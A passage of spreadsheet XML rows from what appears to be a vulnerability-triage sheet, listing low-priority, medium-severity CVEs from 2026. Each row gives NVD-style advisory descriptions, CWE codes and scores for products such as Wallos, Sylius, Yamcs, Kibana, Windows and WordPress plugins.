t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45527</t></is></c></row><row r="2250"><c r="A2250" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2250" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2250" s="5" t="inlineStr"><is><t>CVE-2026-50198</t></is></c><c r="D2250" s="5" t="n"><v>4.3</v></c><c r="E2250" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2250" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2250" s="5" t="inlineStr" /><c r="H2250" s="5" t="n"><v>0.002</v></c><c r="I2250" s="5" t="inlineStr" /><c r="J2250" s="5" t="inlineStr" /><c r="K2250" s="5" t="inlineStr" /><c r="L2250" s="5" t="inlineStr" /><c r="M2250" s="5" t="inlineStr" /><c r="N2250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2250" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2250" s="5" t="inlineStr" /><c r="Q2250" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2250" s="5" t="inlineStr"><is><t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.1, an authenticated user can edit their own inactive subscription and set replacement_subscription_id to a subscription ID belonging to another user. The write is accepted, and later the stats logic dereferences that foreign subscription ID without user_id scoping. This lets the attacker infer the victim subscription's monthly-normalized cost by observing changes in their own stats output. This does not expose the full victim subscription object, but it does expose derived financial metadata. This issue has been patched in version 4.9.1.</t></is></c><c r="S2250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50198</t></is></c></row><row r="2251"><c r="A2251" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2251" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2251" s="5" t="inlineStr"><is><t>CVE-2026-50199</t></is></c><c r="D2251" s="5" t="n"><v>4.3</v></c><c r="E2251" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2251" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2251" s="5" t="inlineStr" /><c r="H2251" s="5" t="n"><v>0.002</v></c><c r="I2251" s="5" t="inlineStr" /><c r="J2251" s="5" t="inlineStr" /><c r="K2251" s="5" t="inlineStr" /><c r="L2251" s="5" t="inlineStr" /><c r="M2251" s="5" t="inlineStr" /><c r="N2251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2251" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2251" s="5" t="inlineStr" /><c r="Q2251" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2251" s="5" t="inlineStr"><is><t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.1, endpoints/currency/update_exchange.php loads the first Fixer/API Layer credential globally instead of loading the credential for the authenticated user. As a result, a normal authenticated user without their own provider key can trigger exchange-rate refreshes using another user's stored provider credential. This issue has been patched in version 4.9.1.</t></is></c><c r="S2251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50199</t></is></c></row><row r="2252"><c r="A2252" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2252" s="5" t="inlineStr"><is><t>CVE-2026-53638</t></is></c><c r="D2252" s="5" t="n"><v>4.3</v></c><c r="E2252" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2252" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2252" s="5" t="inlineStr" /><c r="H2252" s="5" t="n"><v>0.002</v></c><c r="I2252" s="5" t="inlineStr" /><c r="J2252" s="5" t="inlineStr" /><c r="K2252" s="5" t="inlineStr" /><c r="L2252" s="5" t="inlineStr" /><c r="M2252" s="5" t="inlineStr" /><c r="N2252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2252" s="5" t="inlineStr" /><c r="Q2252" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2252" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, an authorization bypass vulnerability exists in the shop account API. The `PATCH /api/v2/shop/account/orders/{tokenValue}/payments/{paymentId}` endpoint, used by an authenticated shop customer to change the payment method of an order that has been placed but not yet paid (state `STATE_NEW`), does not validate that the chosen payment method is enabled for the order's channel. The equivalent checkout endpoint (`PATCH /api/v2/shop/orders/{tokenValue}/payments/{paymentId}`) correctly rejects out-of-channel payment methods with `HTTP 422`; the account endpoint silently accepts them and returns `HTTP 200`. An authenticated customer can therefore assign any globally enabled payment method to their own placed order, including methods that the store operator has explicitly excluded from that channel. The issue is fixed in versions: 2.0.18, 2.1.15, 2.2.6 and above. As a workaround, decorate the `Sylius\Bundle\ApiBundle\Changer\PaymentMethodChangerInterface` service in the application.</t></is></c><c r="S2252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53638</t></is></c></row><row r="2253"><c r="A2253" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2253" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2253" s="5" t="inlineStr"><is><t>CVE-2026-55547</t></is></c><c r="D2253" s="5" t="n"><v>4.3</v></c><c r="E2253" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2253" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2253" s="5" t="inlineStr" /><c r="H2253" s="5" t="n"><v>0.003</v></c><c r="I2253" s="5" t="inlineStr" /><c r="J2253" s="5" t="inlineStr" /><c r="K2253" s="5" t="inlineStr" /><c r="L2253" s="5" t="inlineStr" /><c r="M2253" s="5" t="inlineStr" /><c r="N2253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2253" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P2253" s="5" t="inlineStr" /><c r="Q2253" s="5" t="inlineStr"><is><t>CWE-285, CWE-862</t></is></c><c r="R2253" s="5" t="inlineStr"><is><t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs omits SystemPrivilege.ControlAccess checks from IamApi.listRoles, IamApi.getRole, and IamApi.listPrivileges in yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java. Any authenticated account can call GET /api/roles, GET /api/roles/{name}, and GET /api/privileges to enumerate available system privileges and configured role mappings. The disclosure reveals security configuration that can support targeted privilege-escalation attempts. This issue is fixed in versions 5.12.8 and 5.13.2.</t></is></c><c r="S2253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55547</t></is></c></row><row r="2254"><c r="A2254" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2254" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2254" s="5" t="inlineStr"><is><t>CVE-2026-55566</t></is></c><c r="D2254" s="5" t="n"><v>4.3</v></c><c r="E2254" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2254" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2254" s="5" t="inlineStr" /><c r="H2254" s="5" t="n"><v>0.003</v></c><c r="I2254" s="5" t="inlineStr" /><c r="J2254" s="5" t="inlineStr" /><c r="K2254" s="5" t="inlineStr" /><c r="L2254" s="5" t="inlineStr" /><c r="M2254" s="5" t="inlineStr" /><c r="N2254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2254" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P2254" s="5" t="inlineStr" /><c r="Q2254" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2254" s="5" t="inlineStr"><is><t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs processes attacker-controlled data from the /ext URL route in yamcs-web/src/main/webapp/projects/webapp/src/app/core/routes/extension.matcher.ts, extension.component.ts, and app.component.ts without checking registered plugin IDs before DOM rendering through innerHTML. A crafted URL can execute JavaScript when opened by a user. The script can read data available to the Yamcs web application and perform actions in the user context. This issue is fixed in versions 5.12.8 and 5.13.2.</t></is></c><c r="S2254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55566</t></is></c></row><row r="2255"><c r="A2255" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2255" s="5" t="inlineStr"><is><t>CVE-2026-73019</t></is></c><c r="D2255" s="5" t="n"><v>4.3</v></c><c r="E2255" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2255" s="5" t="inlineStr" /><c r="H2255" s="5" t="n"><v>0.007</v></c><c r="I2255" s="5" t="inlineStr" /><c r="J2255" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2255"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55" s="5" t="inlineStr" /><c r="M2255" s="5" t="inlineStr" /><c r="N2255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2255" s="5" t="inlineStr" /><c r="Q2255" s="5" t="inlineStr"><is><t>CWE-41</t></is></c><c r="R2255" s="5" t="inlineStr"><is><t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S2255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t></is></c></row><row r="2256"><c r="A2256" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2256" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2256" s="5" t="inlineStr"><is><t>CVE-2026-75018</t></is></c><c r="D2256" s="5" t="n"><v>4.3</v></c><c r="E2256" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2256" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G2256" s="5" t="inlineStr" /><c r="H2256" s="5" t="n"><v>0.003</v></c><c r="I2256" s="5" t="inlineStr" /><c r="J2256" s="5" t="inlineStr" /><c r="K2256" s="5" t="inlineStr" /><c r="L2256" s="5" t="inlineStr" /><c r="M2256" s="5" t="inlineStr" /><c r="N2256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2256" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2256" s="5" t="inlineStr" /><c r="Q2256" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2256" s="5" t="inlineStr"><is><t>The Custom Contact Forms plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 7.16. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to permanently force-delete arbitrary posts of any post type (including pages, administrator-authored posts, and WooCommerce products) and write arbitrary ccf_field_* post meta onto any post regardless of ownership or post type. The top-level form ID is checked via edit_post/publish_posts, but the nested fields[].ID and choices[].ID paths processed by _create_and_map_fields() and _create_and_map_choices() carry no equivalent capability or post-type guard, leaving those sinks fully exposed while delete_item() and delete_submission() contain explicit post-type restriction fixes demonstrating the developer's awareness of scoping requirements.</t></is></c><c r="S2256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75018</t></is></c></row><row r="2257"><c r="A2257" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2257" s="5" t="inlineStr"><is><t>CVE-2026-76962</t></is></c><c r="D2257" s="5" t="n"><v>4.3</v></c><c r="E2257" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2257" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G2257" s="5" t="inlineStr" /><c r="H2257" s="5" t="n"><v>0.002</v></c><c r="I2257" s="5" t="inlineStr" /><c r="J2257" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K2257" s="5" t="inlineStr" /><c r="L2257" s="5" t="inlineStr" /><c r="M2257" s="5" t="inlineStr" /><c r="N2257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2257" s="5" t="inlineStr" /><c r="Q2257" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2257" s="5" t="inlineStr"><is><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is></c><c r="S2257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t></is></c></row><row r="2258"><c r="A2258" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2258" s="5" t="inlineStr"><is><t>CVE-2026-76963</t></is></c><c r="D2258" s="5" t="n"><v>4.3</v></c><c r="E2258" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2258" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G2258" s="5" t="inlineStr" /><c r="H2258" s="5" t="n"><v>0.002</v></c><c r="I2258" s="5" t="inlineStr" /><c r="J2258" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K2258" s="5" t="inlineStr" /><c r="L2258" s="5" t="inlineStr" /><c r="M2258" s="5" t="inlineStr" /><c r="N2258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2258" s="5" t="inlineStr" /><c r="Q2258" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2258" s="5" t="inlineStr"><is><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is></c><c r="S2258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t></is></c></row><row r="2259"><c r="A2259" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2259" s="5" t="inlineStr"><is><t>CVE-2026-76977</t></is></c><c r="D2259" s="5" t="n"><v>4.3</v></c><c r="E2259" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2259" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G2259" s="5" t="inlineStr" /><c r="H2259" s="5" t="n"><v>0.002</v></c><c r="I2259" s="5" t="inlineStr" /><c r="J2259" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K2259" s="5" t="inlineStr" /><c r="L2259" s="5" t="inlineStr" /><c r="M2259" s="5" t="inlineStr" /><c r="N2259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2259" s="5" t="inlineStr" /><c r="Q2259" s="5" t="inlineStr"><is><t>CWE-1289</t></is></c><c r="R2259" s="5" t="inlineStr"><is><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is></c><c r="S2259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t></is></c></row><row r="2260"><c r="A2260" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2260" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2260" s="5" t="inlineStr"><is><t>CVE-2026-77352</t></is></c><c r="D2260" s="5" t="n"><v>4.3</v></c><c r="E2260" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2260" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2260" s="5" t="inlineStr" /><c r="H2260" s="5" t="n"><v>0.002</v></c><c r="I2260" s="5" t="inlineStr" /><c r="J2260" s="5" t="inlineStr" /><c r="K2260" s="5" t="inlineStr" /><c r="L2260" s="5" t="inlineStr" /><c r="M2260" s="5" t="inlineStr" /><c r="N2260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2260" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2260" s="5" t="inlineStr" /><c r="Q2260" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2260" s="5" t="inlineStr"><is><t>Wallos is an open-source, self-hostable personal subscription tracker. From version 2.0.0 to before version 5.0.0, any authenticated Wallos user (no admin rights required) can make the server open arbitrary outbound SMTP connections to internal/link-local addresses, by setting the SMTP host of their personal email notifications to an internal IP. The per-user notification settings endpoint (endpoints/notifications/saveemailnotifications.php) performs no SSRF validation, and the notification cron (endpoints/cronjobs/sendnotifications.php) feeds that user-controlled host straight into PHPMailer ($mail-&gt;Host = $email['smtpAddress']). When the user's subscription notification fires, the server connects to the chosen host:port. This issue has been patched in version 5.0.0.</t></is></c><c r="S2260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77352</t></is></c></row><row r="2261"><c r="A2261" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2261" s="5" t="inlineStr"><is><t>CVE-2026-78455</t></is></c><c r="D2261" s="5" t="n"><v>4.3</v></c><c r="E2261" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2261" s="5" t="inlineStr" /><c r="H2261" s="5" t="n"><v>0.005</v></c><c r="I2261" s="5" t="inlineStr" /><c r="J2261" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2261" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2016, microsoft:windows_server_2019</t></is></c><c r="L2261" s="5" t="inlineStr" /><c r="M2261" s="5" t="inlineStr" /><c r="N2261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2261" s="5" t="inlineStr" /><c r="Q2261" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2261" s="5" t="inlineStr"><is><t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="S2261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t></is></c></row><row r="2262"><c r="A2262" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2262" s="5" t="inlineStr"><is><t>CVE-2026-78516</t></is></c><c r="D2262" s="5" t="n"><v>4.3</v></c><c r="E2262" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2262" s="5" t="inlineStr" /><c r="H2262" s="5" t="n"><v>0.005</v></c><c r="I2262" s="5" t="inlineStr" /><c r="J2262" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2262" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012, microsoft:windows_server_2016</t></is></c><c r="L2262" s="5" t="inlineStr" /><c r="M2262" s="5" t="inlineStr" /><c r="N2262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2262" s="5" t="inlineStr" /><c r="Q2262" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R2262" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="S2262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t></is></c></row><row r="2263"><c r="A2263" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2263" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2263" s="5" t="inlineStr"><is><t>CVE-2026-78593</t></is></c><c r="D2263" s="5" t="n"><v>4.3</v></c><c r="E2263" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2263" s="5" t="inlineStr"><is><t>security@elastic.co</t></is></c><c r="G2263" s="5" t="inlineStr" /><c r="H2263" s="5" t="n"><v>0.002</v></c><c r="I2263" s="5" t="inlineStr" /><c r="J2263" s="5" t="inlineStr"><is><t>elastic</t></is></c><c r="K2263" s="5" t="inlineStr" /><c r="L2263" s="5" t="inlineStr" /><c r="M2263" s="5" t="inlineStr" /><c r="N2263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2263" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2263" s="5" t="inlineStr" /><c r="Q2263" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R2263" s="5" t="inlineStr"><is><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is></c><c r="S2263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78593</t></is></c></row><row r="2264"><c r="A2264" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2264" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2264" s="5" t="inlineStr"><is><t>CVE-2026-78595</t></is></c><c r="D2264" s="5" t="n"><v>4.3</v></c><c r="E2264" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2264" s="5" t="inlineStr"><is><t>security@elastic.co</t></is></c><c r="G2264" s="5" t="inlineStr" /><c r="H2264" s="5" t="n"><v>0.002</v></c><c r="I2264" s="5" t="inlineStr" /><c r="J2264" s="5" t="inlineStr" /><c r="K2264" s="5" t="inlineStr" /><c r="L2264" s="5" t="inlineStr" /><c r="M2264" s="5" t="inlineStr" /><c r="N2264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2264" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2264" s="5" t="inlineStr" /><c r="Q2264" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2264" s="5" t="inlineStr"><is><t>Missing Authorization in Kibana Leading to Information Disclosure / Missing Authorization (CWE-862) in the Kibana Fleet feature can lead to information disclosure via Privilege Abuse (CAPEC-122). An authenticated user holding read-level Fleet agent privileges in one Kibana space could enumerate agent metadata and access diagnostic content belonging to agents enrolled in other Kibana spaces.</t></is></c><c r="S2264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78595</t></is></c></row><row r="2265"><c r="A2265" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2265" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2265" s="5" t="inlineStr"><is><t>CVE-2026-78596</t></is></c><c r="D2265" s="5" t="n"><v>4.3</v></c><c r="E2265" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2265" s="5" t="inlineStr"><is><t>security@elastic.co</t></is></c><c r="G2265" s="5" t="inlineStr" /><c r="H2265" s="5" t="n"><v>0.002</v></c><c r="I2265" s="5" t="inlineStr" /><c r="J2265" s="5" t="inlineStr" /><c r="K2265" s="5" t="inlineStr" /><c r="L2265" s="5" t="inlineStr" /><c r="M2265" s="5" t="inlineStr" /><c r="N2265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2265" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2265" s="5" t="inlineStr" /><c r="Q2265" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2265" s="5" t="inlineStr"><is><t>Missing Authorization in Kibana Leading to Unauthorized Modification of Data / Missing Authorization (CWE-862) in Kibana can lead to unauthorized modification of data via Privilege Abuse (CAPEC-122). An authenticated user holding Security read-level access in a single Kibana space could trigger Entity Analytics migration operations that perform privileged writes across all Kibana spaces, regardless of that user's actual access scope.</t></is></c><c r="S2265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78596</t></is></c></row><row r="2266"><c r="A2266" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2266" s="5" t="inlineStr"><is><t>CVE-2026-79588</t></is></c><c r="D2266" s="5" t="n"><v>4.3</v></c><c r="E2266" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2266" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2266" s="5" t="inlineStr" /><c r="H2266" s="5" t="n"><v>0.001</v></c><c r="I2266" s="5" t="inlineStr" /><c r="J2266" s="5" t="inlineStr" /><c r="K2266" s="5" t="inlineStr" /><c r="L2266" s="5" t="inlineStr" /><c r="M2266" s="5" t="inlineStr" /><c r="N2266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2266" s="5" t="inlineStr" /><c r="Q2266" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="R2266" s="5" t="inlineStr"><is><t>U-speed WIFI4 N300 T1 Pro v1.0.0 is vulnerable to Cleartext transmission of administration credentials over HTTP.</t></is></c><c r="S2266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79588</t></is></c></row><row r="2267"><c r="A2267" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2267" s="5" t="inlineStr"><is><t>CVE-2026-79603</t></is></c><c r="D2267" s="5" t="n"><v>4.3</v></c><c r="E2267" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2267" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2267" s="5" t="inlineStr" /><c r="H2267" s="5" t="n"><v>0.002</v></c><c r="I2267" s="5" t="inlineStr" /><c r="J2267" s="5" t="inlineStr" /><c r="K2267" s="5" t="inlineStr" /><c r="L2267" s="5" t="inlineStr" /><c r="M2267" s="5" t="inlineStr" /><c r="N2267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2267" s="5" t="inlineStr" /><c r="Q2267" s="5" t="inlineStr"><is><t>CWE-664</t></is></c><c r="R2267" s="5" t="inlineStr"><is><t>x86 PV guests can free memory pages while still keeping a stale TLB entry
pointing to them.  A TLB flush is only issued by Xen (if needed) when the
page is re-used.  Since it's possible for the page to be scrubbed ahead of
the TLB flush, there's a window where a PV guest can modify an already
scrubbed page.</t></is></c><c r="S2267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79603</t></is></c></row><row r="2268"><c r="A2268" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2268" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2268" s="5" t="inlineStr"><is><t>CVE-2026-81423</t></is></c><c r="D2268" s="5" t="n"><v>4.3</v></c><c r="E2268" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2268" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2268" s="5" t="inlineStr" /><c r="H2268" s="5" t="n"><v>0.002</v></c><c r="I2268" s="5" t="inlineStr" /><c r="J2268" s="5" t="inlineStr" /><c r="K2268" s="5" t="inlineStr" /><c r="L2268" s="5" t="inlineStr" /><c r="M2268" s="5" t="inlineStr" /><c r="N2268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2268" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2268" s="5" t="inlineStr" /><c r="Q2268" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="R2268" s="5" t="inlineStr"><is><t>The Accept Stripe Payments WordPress plugin before 2.1.4 does not validate a user-supplied URL before using it in a redirect, allowing unauthenticated attackers to redirect visitors to an arbitrary external website, which can be leveraged for phishing.</t></is></c><c r="S2268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81423</t></is></c></row><row r="2269"><c r="A2269" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2269" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2269" s="5" t="inlineStr"><is><t>CVE-2026-82298</t></is></c><c r="D2269" s="5" t="n"><v>4.3</v></c><c r="E2269" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2269" s="5" t="inlineStr"><is><t>security@elastic.co</t></is></c><c r="G2269" s="5" t="inlineStr" /><c r="H2269" s="5" t="n"><v>0.002</v></c><c r="I2269" s="5" t="inlineStr" /><c r="J2269" s="5" t="inlineStr" /><c r="K2269" s="5" t="inlineStr" /><c r="L2269" s="5" t="inlineStr" /><c r="M2269" s="5" t="inlineStr" /><c r="N2269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2269" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2269" s="5" t="inlineStr" /><c r="Q2269" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2269" s="5" t="inlineStr"><is><t>Incorrect Authorization (CWE-863) in Kibana can lead to denial of service via Exploiting Incorrectly Configured Access Control Security Levels (CAPEC-180).</t></is></c><c r="S2269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82298</t></is></c></row><row r="2270"><c r="A2270" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c 